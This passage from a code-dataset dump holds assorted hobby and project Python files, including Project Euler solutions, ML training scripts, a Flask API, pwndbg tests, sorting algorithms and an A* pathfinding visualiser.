5, 7, 13 and 29.\n# What is the largest prime factor of the number 600851475143 ?\n\n# 1. should know prime numbers first\n# 2. prime list limit should be smaller than root of 600851475143\n# 3. find ou root of 600851475143\n# 4. find out prime list\n# 5. try to divide 600851475143 by arguments in prime list\n# 6. 
the largest one is the largest prime factor of the number 600851475143\n\n\nlimit = int(600851475143 ** 0.5) + 1 #less than 775146\nprime_list = []\nprime_factor = 0\nfor i in range(2, limit):\n limit_i = int(i ** 0.5) + 1\n for j in range(2, limit_i):\n if i % j == 0:\n prime_factor += 1\n if prime_factor == 0:\n prime_list.append(i)\n prime_factor = 0\nprime_factors = []\nfor k in prime_list:\n if 600851475143 % k == 0:\n prime_factors.append(k)\nprint(prime_factors) #[71, 839, 1471, 6857]\n\n# the largest prime factor of the number 600851475143 = 6857\n# but this solution takes a lot of time (over 30secs)\n# how about find factors of 600851475143 limit by 1000 and figure out factors are prime then divide 600851475143 by prime factor first?\n\n# 1. try to divide qValue from 2 to 1000\n# 2. If there are numbers, check these are prime numbers\n# 3. then divide qValue by these numbers. then I can make qValue smaller\nqValue = 600851475143\n\nfactors_upto1000 = []\nfor i in range(2, 1000):\n if qValue % i == 0:\n factors_upto1000.append(i)\nprint(factors_upto1000) #[71, 839]\n\n# 4. check 71, 839 isPrime\n\ndef isPrimeNumber(x):\n for i in range(2, int(x**0.5)+1):\n if x % i == 0:\n return False\n return True\n\n# print(isPrimeNumber(71)) #True\n# print(isPrimeNumber(839)) #True\n\n# 5. divide qValue by 71 and 839, I can find 1471 and 6857\n# 6. 1471 and 6857 is prime number. and qValue == 71 * 839 * 1471 * 6857\n\nqValue_divided = ((qValue / 71) / 839) / 1471 #1471 is Prime factor\nprint(qValue_divided) #final qValue_divided is 6857\nprint(isPrimeNumber(6857)) # True\n\nlimit = int(qValue_divided ** 0.5) + 1\nprime_list = []\nprime_factor = 0\nfor i in range(2, limit):\n limit_i = int(i ** 0.5) + 1\n for j in range(2, limit_i):\n if i % j == 0:\n prime_factor += 1\n if prime_factor == 0:\n prime_list.append(i)\n prime_factor = 0\nprime_factors = []\nfor k in prime_list:\n if qValue_divided % k == 0:\n prime_factors.append(k)\nprint(prime_factors)","repo_name":"Maximume/python_study","sub_path":"Project_Euler/001_010/003_largest prime factor.py","file_name":"003_largest prime factor.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"6914065939","text":"from fast_map import fast_map\nimport time\n\n# this function is called from different processes/threads.\n# Meaning that using threading.Lock objects inside it may\n# lead to a deadlock if the default process creating method\n# happens to be \"fork\" (instead of \"spawn\" or \"forkserver\")\ndef io_and_cpu_expensive_function(x):\n time.sleep(1)\n for i in range(10 ** 4):\n pass\n return x*x\n\nprint('Unlimited threads (threads_count = number of tasks)')\n# 8 threads in total will be used.\n# On 4 core CPU, 2 threads will be spawned in each process.\nfor i in fast_map(io_and_cpu_expensive_function, range(8), threads_limit=None):\n print(i)\nprint('\\n')\n\nprint('Threads limited to 4 (task will take 2 seconds instead of 1)')\n# 8 threads in total will be used.\n# On 4 core cpu, 1 thread will be spawned in each process.\nfor i in fast_map(io_and_cpu_expensive_function, range(8), threads_limit=4):\n print(i)\nprint('\\n')\n\n\ndef task_with_multiple_params(a, b):\n return a + ' - ' + b\n\nprint('Using function with multiple parameters:')\nfor s in fast_map(task_with_multiple_params, ['apple', 'banana', 'cherry'], ['orange', 'lemon', 'pineapple']):\n 
print(s)\n","repo_name":"michalmonday/fast_map","sub_path":"examples/fast_map_usage.py","file_name":"fast_map_usage.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"78"} +{"seq_id":"7447269800","text":"from board_matrix import sparse_to_board_vector\nfrom data import read_h5\nfrom dmd import DMDAnalyzer \n\nimport numpy as np\nfrom typing import List, Tuple\n\ndef create_snapshot_matrix(sparse_matrices: List[List[Tuple[int, int]]]) -> np.ndarray:\n n = len(sparse_matrices)\n snapshot_matrix = np.zeros((64, n), dtype=int)\n for i, sparse_matrix in enumerate(sparse_matrices):\n board_vector = sparse_to_board_vector(sparse_matrix)\n snapshot_matrix[:, i] = board_vector\n return snapshot_matrix\n\nif __name__ == \"__main__\":\n sparse_matrices = read_h5()\n\n # Initialize the DMD Analyzer\n dmd_analyzer = DMDAnalyzer(rank=50)\n \n for matrix in sparse_matrices[:5]:\n # Create the snapshot matrix\n snapshot_matrix = create_snapshot_matrix(matrix)\n \n # Fit the DMD model to the snapshot matrix\n dmd_analyzer.fit(snapshot_matrix)\n \n # Visualize the DMD modes\n dmd_analyzer.plot_modes()\n \n # Predict future states for 10 time steps\n initial_condition = snapshot_matrix[:, 0]\n future_states = dmd_analyzer.apply(initial_condition, 10)","repo_name":"joseph-crowley/chess","sub_path":"simple.py","file_name":"simple.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"35133769245","text":"# test out neural network on MNIST\nimport numpy as np \nimport pandas as pd \n\nfrom lexnet.utils import sigmoid, dsigmoid, relu \nfrom lexnet.utils import ms_loss, dms_loss, grad_descent_simple \nfrom lexnet.utils import label_to_onehot, accuracy\n\nfrom lexnet import Net\n\n# MNIST data folder\nsource_folder = '/home/alex/Desktop/Data/MNIST'\n\n# load up the CSV files for the MNIST\ndf_train = pd.read_csv(f'{source_folder}/mnist_train.csv', header=None)\ndf_test = pd.read_csv(f'{source_folder}/mnist_test.csv', header=None)\n\n# extract the values for training and test sets and convert to np.array\nX_train, y_train = df_train.values[:, 1:].T, df_train.values[:, 0]\nX_test, y_test = df_test.values[:, 1:].T, df_test.values[:, 0]\n\n# scale the image values\nX_train = X_train / 255\nX_test = X_test / 255\n\n# convert the labels to one-hot vectors\n# training data\nY_train = np.concatenate([label_to_onehot(label, 10) for label in y_train], axis=1)\n# test data\nY_test = np.concatenate([label_to_onehot(label, 10) for label in y_test], axis=1)\n\n# neural network hyper parameters\nlayers = [784, 32, 10]\nactivations = [sigmoid, sigmoid, sigmoid]\nnet1 = Net(layers, activations, 'ce_loss')\nnum_epochs = 32\nbatch_size = 64\nepsilon = 5e-4\n\n# gradient descent on the neural net\nlosses = net1.train([X_train, X_test], [Y_train, Y_test], num_epochs, batch_size, epsilon)","repo_name":"ajl2718/lexnet","sub_path":"mnist_test.py","file_name":"mnist_test.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72744459131","text":"from __future__ import annotations\n\nimport gdb\n\nimport pwndbg\nimport tests\n\nREFERENCE_BINARY = tests.binaries.get(\"reference-binary.out\")\n\n\ndef test_command_ignore_no_breakpoint_set():\n out = gdb.execute(\"ignore 1001\", to_string=True)\n assert out == \"No breakpoints set.\\n\"\n\n\ndef 
test_command_ignore_no_breakpoint_set_remove():\n gdb.execute(\"file \" + REFERENCE_BINARY)\n gdb.execute(\"break break_here\")\n gdb.execute(\"delete 1\")\n out = gdb.execute(\"ignore 1001\", to_string=True)\n assert out == \"No breakpoints set.\\n\"\n\n\ndef test_command_ignore_no_breakpoint_found(start_binary):\n start_binary(REFERENCE_BINARY)\n\n gdb.execute(\"break main\")\n out = gdb.execute(\"ignore 2 1001\", to_string=True)\n assert out == \"No breakpoint number 2.\\n\"\n\n\ndef test_command_ignore_breakpoint_last_found_one():\n gdb.execute(\"file \" + REFERENCE_BINARY)\n gdb.execute(\"break break_here\")\n\n out = gdb.execute(\"ignore 1\", to_string=True)\n assert out == \"Will ignore next 1 crossings of breakpoint 1.\\n\"\n\n gdb.execute(\"run\")\n assert not pwndbg.gdblib.proc.alive\n\n gdb.execute(\"run\")\n assert pwndbg.gdblib.proc.alive\n\n\ndef test_command_ignore_breakpoint_last_found_two():\n gdb.execute(\"file \" + REFERENCE_BINARY)\n gdb.execute(\"break break_here\")\n gdb.execute(\"break main\")\n\n out = gdb.execute(\"ignore 15\", to_string=True)\n assert out == \"Will ignore next 15 crossings of breakpoint 2.\\n\"\n\n\ndef test_command_ignore_breakpoint_last_negative():\n gdb.execute(\"file \" + REFERENCE_BINARY)\n gdb.execute(\"break break_here\")\n\n out = gdb.execute(\"ignore -100\", to_string=True)\n assert out == \"Will ignore next 0 crossings of breakpoint 1.\\n\"\n","repo_name":"pwndbg/pwndbg","sub_path":"tests/gdb-tests/tests/test_command_ignore.py","file_name":"test_command_ignore.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":6166,"dataset":"github-code","pt":"78"} +{"seq_id":"14175946965","text":"import pickle\n\ndirect = 'Python/lecture/Lesson008'\ndef func(a, b, c):\n return a + b + c\nmy_dict = {\n \"numbers\": [42, 4.1415, 7+3j],\n \"functions\": (func, sum, max),\n \"others\": {True, False, 'Hello world!'},\n }\n\nwith open(f'{direct}/my_dict.pickle', 'wb') as f:\n pickle.dump(my_dict, f)","repo_name":"ArtemErmilov/Python_Web_Development","sub_path":"Python/lecture/Lesson008/lect_less08_task16.py","file_name":"lect_less08_task16.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70274456254","text":"import pandas as pd\n\nprint('Loading...')\n\npredictions = pd.read_csv('../../dist/model_04_01_22/pre_submit.csv')\npredictions = predictions[['customer_id', 'article_id', 'rank']]\n\npopular = pd.read_csv('../../dist/model_04_01_22/popular_items.csv')\npopular = popular.loc[:1, ['article_id', 'total']]\n\nprint('Loaded...')\n\npredictions = predictions.groupby('customer_id')[['article_id']].agg(lambda x: list(x)).reset_index()\npredictions['article_id'] = predictions['article_id'].apply(lambda x: ' '.join(map(str, x + popular['article_id'].to_list())))\n\npredictions = predictions.rename(columns={'article_id': 'prediction'})\n\nprint('Writing...')\n\npredictions.to_csv('../../dist/model_04_01_22/submission.csv', index=False)\n\nprint('Done...')","repo_name":"bswaika/csci_567_final_project","sub_path":"src/model_04_01_22/format_predictions.py","file_name":"format_predictions.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20688081886","text":"# -*- coding: utf-8 -*-\r\nfrom __future__ import unicode_literals\r\n\r\nfrom django.db import migrations, models\r\nimport 
django.db.models.deletion\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('defensor', '0009_auto_20180510_1526'),\r\n ('atendimento', '0051_impedimento_anotacao_comunicacao'),\r\n ('assistido', '0016_pessoa_tipo_cadastro'),\r\n ('core', '0001_initial'),\r\n ]\r\n\r\n operations = [\r\n migrations.CreateModel(\r\n name='Indeferimento',\r\n fields=[\r\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\r\n ('medida_pretendida', models.TextField(null=True, blank=True)),\r\n ('justificativa', models.TextField(null=True, blank=True)),\r\n ('resultado', models.SmallIntegerField(default=0, null=True, blank=True, choices=[(0, 'N\\xe3o Avaliado'), (10, 'Deferido'), (20, 'Indeferido')])),\r\n ('tipo_baixa', models.SmallIntegerField(default=0, null=True, blank=True, choices=[(0, 'N\\xe3o Realizada'), (10, 'Retorno Marcado'), (20, 'Encaminhamento Marcado'), (30, 'Atendimento Negado')])),\r\n ('atendimento', models.ForeignKey(related_name='indeferimentos', on_delete=django.db.models.deletion.DO_NOTHING, to='atendimento.Defensor')),\r\n ('defensor', models.ForeignKey(related_name='indeferimentos', on_delete=django.db.models.deletion.DO_NOTHING, to='defensor.Defensor')),\r\n ('pessoa', models.ForeignKey(related_name='indeferimentos', on_delete=django.db.models.deletion.DO_NOTHING, to='assistido.PessoaAssistida')),\r\n ('processo', models.OneToOneField(related_name='indeferimento', on_delete=django.db.models.deletion.DO_NOTHING, to='core.Processo')),\r\n ],\r\n ),\r\n ]\r\n","repo_name":"SegurancaDPDF/SOLAR-Backend","sub_path":"indeferimento/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9305615884","text":"from typing import Dict, List\nfrom flask import Flask, jsonify\nfrom flask_restful import Resource, Api, reqparse\nfrom IPython import embed\nfrom interfaces import Conta\nfrom mensagens import Mensagens\n\nAPP = Flask(__name__)\nAPI = Api(APP)\n\nPARSER = reqparse.RequestParser()\nPARSER.add_argument('saque', type=float)\nPARSER.add_argument('valor', type=float)\nPARSER.add_argument('saldo_inicial', type=float)\n\nCONTAS = {\n 'conta1': Conta(1, 300.0),\n 'conta2': Conta(2, 750.99),\n 'conta3': Conta(3, 70.50),\n}\n\n\ndef conta_existe(id: int, contas: List[Dict]) -> bool:\n key = f'conta{id}'\n return contas.get(key) != None\n\n\ndef get_conta(id: int, contas: List[Dict]) -> Conta:\n return contas.get(f'conta{id}')\n\n\ndef get_max_id(contas: List[Dict]) -> int:\n return max(list(map(lambda x: int(x.split('conta')[1]), contas)))\n\n\nclass Contas(Resource):\n def get(self):\n return [data.__dict__ for _, data in CONTAS.items()]\n\n def post(self):\n id = get_max_id(CONTAS) + 1\n CONTAS[f'conta{id}'] = Conta(id, 0.0)\n\n return CONTAS[f'conta{id}'].__dict__\n\n\nclass ContaResource(Resource):\n def get(self, id: int):\n if conta_existe(id, CONTAS):\n return get_conta(id, CONTAS).__dict__\n\n return Mensagens.INEXISTENTE(id)\n\n def delete(self, id: int):\n if conta_existe(id, CONTAS):\n CONTAS.pop(f'conta{id}')\n return Mensagens.REMOVIDO(id)\n\n return Mensagens.INEXISTENTE(id)\n\n def patch(self, id: int):\n response = Mensagens.INEXISTENTE(id)\n\n if conta_existe(id, CONTAS):\n args = PARSER.parse_args()\n conta = get_conta(id, CONTAS)\n \n saque = args['saque']\n valor = args['valor']\n\n if saque == True:\n response = conta.saque(valor)\n else:\n response 
= conta.deposito(valor)\n\n return response\n\n\n@APP.after_request\ndef after_request(response):\n response.headers.add('Access-Control-Allow-Origin', '*')\n response.headers.add('Access-Control-Allow-Headers',\n 'Origin, Content-Type')\n response.headers.add('Access-Control-Allow-Methods',\n 'GET, PUT, PATCH, POST, DELETE')\n return response\n\n\nRESOURCES = [\n (Contas, '/contas'),\n (ContaResource, '/contas/'),\n]\n\nif __name__ == '__main__':\n for resource, endpoint in RESOURCES:\n API.add_resource(resource, endpoint)\n\n APP.run(debug=True)\n","repo_name":"SuxPorT/contas-bancarias-rws","sub_path":"backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33295579264","text":"from Library_py.DataStructures.SegmentTree.SegmentTree import SegmentTree\nfrom Library_py.Graph.HLD.HLD import HLD\nfrom typing import Union, Iterable, Callable, TypeVar, Generic, List\nT = TypeVar('T')\n\nclass HLDNoncommutativeSegmentTree(Generic[T]):\n\n def __init__(self, hld: HLD, n_or_a: Union[int, Iterable[T]], op: Callable[[T, T], T], e: T):\n self.hld: HLD = hld\n a = [e] * n_or_a if isinstance(n_or_a, int) else self.hld.build_list(list(n_or_a))\n self.seg: SegmentTree[T] = SegmentTree(a, op, e)\n self.rseg: SegmentTree[T] = SegmentTree(a[::-1], op, e)\n self.op: Callable[[T, T], T] = op\n self.e: T = e\n\n def path_prod(self, u: int, v: int) -> T:\n head, nodein, dep, par, n = self.hld.head, self.hld.nodein, self.hld.dep, self.hld.par, self.hld.n\n lres, rres = self.e, self.e\n seg, rseg = self.seg, self.rseg\n while head[u] != head[v]:\n if dep[head[u]] > dep[head[v]]:\n lres = self.op(lres, rseg.prod(n-nodein[u]-1, n-nodein[head[u]]))\n u = par[head[u]]\n else:\n rres = self.op(seg.prod(nodein[head[v]], nodein[v]+1), rres)\n v = par[head[v]]\n if dep[u] > dep[v]:\n lres = self.op(lres, rseg.prod(n-nodein[u]-1, n-nodein[v]))\n else:\n lres = self.op(lres, seg.prod(nodein[u], nodein[v]+1))\n return self.op(lres, rres)\n\n def get(self, k: int) -> T:\n return self.seg[self.hld.nodein[k]]\n\n def set(self, k: int, v: T) -> None:\n self.seg[self.hld.nodein[k]] = v\n self.rseg[self.hld.n-self.hld.nodein[k]-1] = v\n\n __getitem__ = get\n __setitem__ = set\n\n","repo_name":"titanium-22/Library_py","sub_path":"Graph/HLD/HLDNoncommutativeSegmentTree.py","file_name":"HLDNoncommutativeSegmentTree.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"72015779464","text":"import csv\nimport time\nimport cv2\nimport numpy as np\nimport tensorflow as tf\ntf.python.control_flow_ops = tf\n\n# Read in .csv file containing references to training imagery and steering data\nlines = []\nwith open('newlog.csv') as csvfile:\n reader = csv.reader(csvfile)\n numLines = 0\n for line in reader:\n if numLines == 0:\n numLines += 1 # Don't process first line with header text in fields\n else:\n numLines += 1\n lines.append(line)\n\nlocaltime = time.asctime(time.localtime(time.time()))\nprint(localtime, \"Number of lines read from .csv input file:\", str(len(lines)))\n\n# Read in the image file paths, along with associated steering measurements\n# from each line in input training data file, and store them in images\n# and measurements lists.\nimages = []\nmeasurements = []\n#evenLine = True\n#numLines = 0\nfor line in lines:\n path = line[0]\n image = cv2.imread(path)\n measurement = 
float(line[3])\n# Code below, to flip every other image, is commented out, as it did not help performance\n# of the model during test runs.\n# Flip every other image, so as to reduce \"left turn bias\"\n# numLines += 1\n# if evenLine:\n# evenLine = False\n# else:\n# evenLine = True\n# image = np.fliplr(image)\n# measurement = -measurement\n images.append(image)\n measurements.append(measurement)\n\n# Put the training data into X_train and y_train numpy arrays,\n# as required by Keras(and underlying TensorFlow) model.fit() method.\ny_train = np.array(measurements)\nX_train = np.array(images)\nlocaltime = time.asctime(time.localtime(time.time()))\nprint (localtime, \"X_train & y_train np.array structures created, defining Keras NN model\")\n\n# Keras library module imports\nfrom keras.models import Sequential\nfrom keras.layers import Lambda\nfrom keras.layers.core import Dense, Flatten\nfrom keras.layers.convolutional import Convolution2D, Cropping2D\n\n# Implement Keras Neural Network, based on NVIDIA CNN architecture\n# described in the paper: arXiv.1604.073116v1 [cs.CV] 25 Apr 2016\n# - Lambda layer provides image normalization.\n# - Python generator not used, as training this model with 5 Epochs produces\n# great results at only ~58 seconds per epoch on a GTX1060 graphics card;\n# so the extra complexity is not warrented.\n# - Over-fitting is avoided by keeping training passes to about 5 Epochs,\n# when using less than 10,000 training data samples.\n# - Adam Optimizer used to auto-tune learning rate parameters during training.\nmodel = Sequential()\nmodel.add(Lambda(lambda x: (x / 255.0) - 0.5, input_shape=(160,320,3)))\nmodel.add(Cropping2D(cropping=((70,25),(0,0))))\nmodel.add(Convolution2D(24, 5, 5, subsample=[2,2], activation='relu'))\nmodel.add(Convolution2D(36, 5, 5, subsample=[2,2], activation='relu'))\nmodel.add(Convolution2D(48, 5, 5, subsample=[2,2], activation='relu'))\nmodel.add(Convolution2D(64, 3, 3, activation='relu'))\nmodel.add(Convolution2D(64, 3, 3, activation='relu'))\nmodel.add(Flatten())\nmodel.add(Dense(100, activation='relu'))\nmodel.add(Dense(50, activation='relu'))\nmodel.add(Dense(10, activation='relu'))\nmodel.add(Dense(1, activation='tanh'))\n\nmodel.compile(loss='mse', optimizer='adam')\nmodel.fit(X_train, y_train, nb_epoch=5, validation_split=0.2, shuffle=True)\n\nmodel.save('model.h5')\n","repo_name":"blunderbuss9/CarND-P3-BC-StewartTeaze","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"27329950260","text":"#**************bubble***************\r\ndef bubble_sort(A, n):\r\n comparisons = 0 #comparison counter\r\n for k in range(0, n-1): # Iterate through the array n-1 times, where n is the length of the array,\r\n for i in range(0, n-1):\r\n comparisons += 1 #for each comparison increment \r\n if A[i] > A[i+1]: #Comparing the indexes\r\n A[i], A[i+1] = A[i+1], A[i] #swapping the indexes \r\n return A, comparisons\r\n\r\n#**************bubble2***************\r\ndef bubble_sort2(A, n):\r\n comparisons = 0 #comparison counter\r\n for k in range(0, n-1): # Iterate through the array n-1 times, where n is the length of the array\r\n for i in range(0, n-k-1): # The inner loop ends at n-k-1 because the k largest elements are already in their correct positions\r\n comparisons += 1 #for each comparison increment \r\n if A[i] > A[i+1]: #Comparing the indexes\r\n A[i], A[i+1] = A[i+1], A[i] #swapping the indexes \r\n 
return A, comparisons\r\n\r\n\r\n#**************bubble3***************\r\ndef bubble_sort3(A, n):\r\n comparisons = 0\r\n for k in range(0, n-1):\r\n flag = 0\r\n for i in range(0, n-1):\r\n comparisons += 1\r\n if A[i] > A[i+1]: #Comparing the indexes\r\n A[i], A[i+1] = A[i+1], A[i] #swapping the indexes \r\n flag = 1 #if flag = 1 then continue the program as the array is not sorted \r\n if flag == 0: #if flag == 0 that means its all sorted and it will terminate early (no swaps wore made)\r\n break\r\n return A, comparisons\r\n\r\n#**************bubble4***************\r\n#Essentially the same comments as the functions above\r\ndef bubble_sort4(A, n):\r\n comparisons = 0\r\n for k in range(0, n-1):\r\n flag = 0\r\n for i in range(0, n-k-1):\r\n comparisons += 1\r\n if A[i] > A[i+1]:\r\n A[i], A[i+1] = A[i+1], A[i]\r\n flag = 1\r\n if flag == 0:\r\n break\r\n return A, comparisons\r\n\r\n#**************sink***************\r\ndef SinkDownSort(A, n):\r\n comparisons = 0\r\n for k in range(n-1, 0, -1): #decrement by 1 as sink down sort goes backwards \r\n flag = 0\r\n for i in range(0, k): \r\n comparisons += 1\r\n if A[i] > A[i+1]: #comparing indexes \r\n A[i], A[i+1] = A[i+1], A[i] #swapping indexes \r\n flag = 1 #if flag = 1 then continue the program as the array is not sorted \r\n if flag == 0: #if flag == 0 that means its all sorted and it will terminate early (no swaps wore made)\r\n break\r\n return A, comparisons\r\n\r\n#**************bidirectsort***************\r\ndef BiDirectSort(A, n):\r\n comparisons = 0\r\n for k in range(n//2): #The array is split into two sub arrays and the sorting for each sub array will be performed during each iteration \r\n left_flag = False\r\n right_flag = False\r\n for i in range(k, n-k-1): #scan left\r\n if A[i] > A[i+1]: #comparing the first half of the indexes \r\n A[i], A[i+1] = A[i+1], A[i] #swapping the indexes \r\n left_flag = True\r\n comparisons += 1\r\n for i in range(n-k-2, k, -1): #scan right \r\n if A[i] < A[i-1]: #comparing the second half of the indexes \r\n A[i], A[i-1] = A[i-1], A[i] #swapping the indexes \r\n right_flag = True\r\n comparisons += 1\r\n if not left_flag and not right_flag: #checking if any swaps wore made if not then break (terminate early)\r\n break\r\n return A, comparisons\r\n\r\n#**************selection***************\r\ndef selectionSort(A, n):\r\n comparisons = 0 #comparison counter\r\n for i in range(0, n-1): #iterate over the array except the last element\r\n imin = i #set the index of the minimum value to the current index i\r\n for j in range(i+1, n): #iterate over the remaining unsorted elements in the array\r\n if A[j] < A[imin]: #compare the value of the current element to the minimum value\r\n imin = j #if current element is less than minimum value, update index of minimum value\r\n comparisons += 1 #increment comparison counter for each comparison made\r\n A[i], A[imin] = A[imin], A[i] #swap indexes \r\n return A, comparisons\r\n \r\n#**************insertion*************** \r\ndef insertionSort(A, n):\r\n comparisons = 0 #comparison counter\r\n for i in range(1, n): #iterate through the array starting from the second element\r\n value = A[i] #set the value of the current element\r\n hole = i #set the index of the current element \r\n while(hole > 0 and A[hole-1] > value): #compare the value with the elements to the left\r\n A[hole] = A[hole-1] #shift the greater elements to the right\r\n hole = hole - 1 #decrement the hole index\r\n comparisons += 1 #increment the comparison counter\r\n A[hole] = value 
#insert the value in the correct position\r\n return A, comparisons\r\n\r\n\r\n#**************quick sort***************\r\ndef partition(A, start, end):\r\n pivot = A[end] #Selecting the pivot element as the last element in the array\r\n pindex = start #Initializing the pivot index to the start of the array\r\n comparisons = 0 #Initializing the comparison counter\r\n for i in range(start, end): #Iterating over the array from start to end\r\n comparisons += 1 #Incrementing the comparison counter for each comparison\r\n if A[i] <= pivot: #If the current element is less than or equal to the pivot element\r\n A[i], A[pindex] = A[pindex], A[i] #Swap the current element with the element at pivot index\r\n pindex += 1 \r\n A[end], A[pindex] = A[pindex], A[end] #Finally, swap the pivot element with the element at pivot index\r\n return pindex, comparisons\r\n\r\ndef quicksort(A, start, end, n):\r\n comparisons = 0 #Initializing the comparison counter\r\n if start < end: #If there are more than one elements in the array\r\n pindex, comp1 = partition(A, start, end) #Perform partitioning and get the pivot index and the number of comparisons made\r\n comparisons += comp1 #Add the number of comparisons made during partitioning to the total comparison count\r\n quicksort(A, start, pindex-1, n) #Recursively sort the left sub array (its recursive because we are calling the quicksort function within itself)\r\n quicksort(A, pindex+1, end, n) #Recursively sort the right sub array\r\n return A, comparisons\r\n#***************************************\r\n\r\n\r\n#**************merge sort***************\r\ndef merge(L,R,A):\r\n nL = len(L) #length of left subarray\r\n nR = len(R) #length of right subarray\r\n j, i, k = 0, 0, 0 #initialize indices for left, right and merged arrays\r\n num_comparisons = 0 #counter variable for comparisons\r\n while(i < nL and j < nR): #merge until either subarray cant anymore\r\n num_comparisons += 1 #increment counter for comparison\r\n if(L[i] <= R[j]): #compare left and right elements\r\n A[k] = L[i] #copy smaller element to merged array\r\n i+=1 #move to next element in left subarray\r\n else:\r\n A[k] = R[j] #copy smaller element to merged array\r\n j+=1 #move to next element in right subarray\r\n k+=1 \r\n while(i < nL): #copy remaining elements in left subarray\r\n A[k] = L[i]\r\n i+=1 \r\n k+=1 \r\n while(j < nR): #copy remaining elements in right subarray\r\n A[k] = R[j]\r\n j+=1 \r\n k+=1 \r\n return num_comparisons\r\n\r\ndef MergeSort(A, n):\r\n num = len(A) #length of input array\r\n if(num < 2):\r\n return A, 0 #return 0 comparisons for single element arrays\r\n mid = num // 2 #calculate midpoint of input array entered by user\r\n left = []\r\n right = []\r\n for i in range(0, mid):\r\n left.append(A[i])\r\n for i in range(mid, n):\r\n right.append(A[i])\r\n left, lcomp = MergeSort(left, len(left)) #recursively sort left subarray\r\n right, rcomp = MergeSort(right, len(right)) #recursively sort right subarray\r\n merge_comp = merge(left, right, A) #merge sorted left and right subarrays\r\n num_comparisons = lcomp + rcomp + merge_comp #total comparisons made in this sorting operation\r\n return A, num_comparisons\r\n#***************************************\r\n\r\n#**************heap sort***************\r\ndef heap_sort(arr, n):\r\n comparisons = 0\r\n \r\n #Build max heap\r\n for i in range(n // 2 - 1, -1, -1):\r\n heapify(arr, n, i, comparisons)\r\n \r\n #Extract elements from heap one by one\r\n for i in range(n - 1, 0, -1):\r\n arr[0], arr[i] = arr[i], arr[0] 
#swap\r\n heapify(arr, i, 0, comparisons)\r\n \r\n return arr, comparisons\r\n\r\ndef heapify(arr, n, i, comparisons):\r\n largest = i #Initialize largest as root\r\n left = 2 * i + 1 #left child\r\n right = 2 * i + 2 #right child\r\n \r\n #if left child is larger than root\r\n if left < n and arr[left] > arr[largest]:\r\n largest = left\r\n \r\n #if right child is larger than largest so far\r\n if right < n and arr[right] > arr[largest]:\r\n largest = right\r\n \r\n #if largest is not root\r\n if largest != i:\r\n arr[i], arr[largest] = arr[largest], arr[i] # swap\r\n comparisons += 1\r\n heapify(arr, n, largest, comparisons)\r\n#***************************************\r\n","repo_name":"petaravramoski/Sorting-Algorithms-Comparison","sub_path":"sorting_algorithms.py","file_name":"sorting_algorithms.py","file_ext":"py","file_size_in_byte":9390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17971111994","text":"import sys\nfrom time import sleep\nfrom classroom import *\ninp = sys.argv[1].upper()\n\nif inp in classes:\n open_link(classes[inp])\nelif inp == 'TODAY' or inp == '-T':\n print()\n classes_today()\nelif inp == 'HELP' or inp == '-H':\n help_menu()\nelif inp == 'AUTOMATE' or inp == '-A':\n subs = find_classes()\n c = 0\n while True:\n if c == 1:\n break\n time = datetime.now().time()\n time = str(time).split(':')\n print(time)\n ['08', '57', '29.790054']\n for i in subs:\n print('Executando')\n if time[0] == i[0] and time[1] == i[3:5] and 'INTERVALO' in i:\n print('Caiu no if')\n open_link(classes[i[25:]])\n print('Opened ' + i[25:] + ' link')\n if i == subs[-1]:\n c = 1\n break\n sleep(3600)\n break\nelse:\n print('\\n' + '\\t' + 'Invalid command')\n print('\\n' + '\\t' + 'Try class -h for help menu')","repo_name":"jorgelisboa/classroom_bot","sub_path":"aula.py","file_name":"aula.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"32679432293","text":"import pygame\nimport cell as cell\n\n# set up the display\nWIDTH = 500\nWIN = pygame.display.set_mode((WIDTH, WIDTH))\npygame.display.set_caption(\"A* Path Finding Algorithm\")\n\n\n# main function\ndef main(win, width):\n # make the grid\n ROWS = 50\n grid = cell.make_grid(ROWS, width)\n\n # define the start and end position\n start = None\n end = None\n\n run = True\n started = False\n\n while run:\n # draw everything\n cell.draw(win, grid, ROWS, width)\n\n # loop through all the events and check what they are\n for event in pygame.event.get():\n # stop running the game if x is pressed\n if event.type == pygame.QUIT:\n run = False\n\n # if the left mouse button was pressed\n if pygame.mouse.get_pressed()[0]:\n pos = pygame.mouse.get_pos()\n row, col = cell.get_clicked_pos(pos, ROWS, width)\n spot = grid[row][col]\n\n # if click did not set start position\n if not start and spot != end:\n # set start position\n start = spot\n start.make_start()\n \n # if click did not set end position\n elif not end and spot != start:\n # set end position\n end = spot\n end.make_end()\n\n # if click did not set start of end position\n elif spot != end and spot != end:\n # create a barrier\n spot.make_barrier() \n\n # if the right 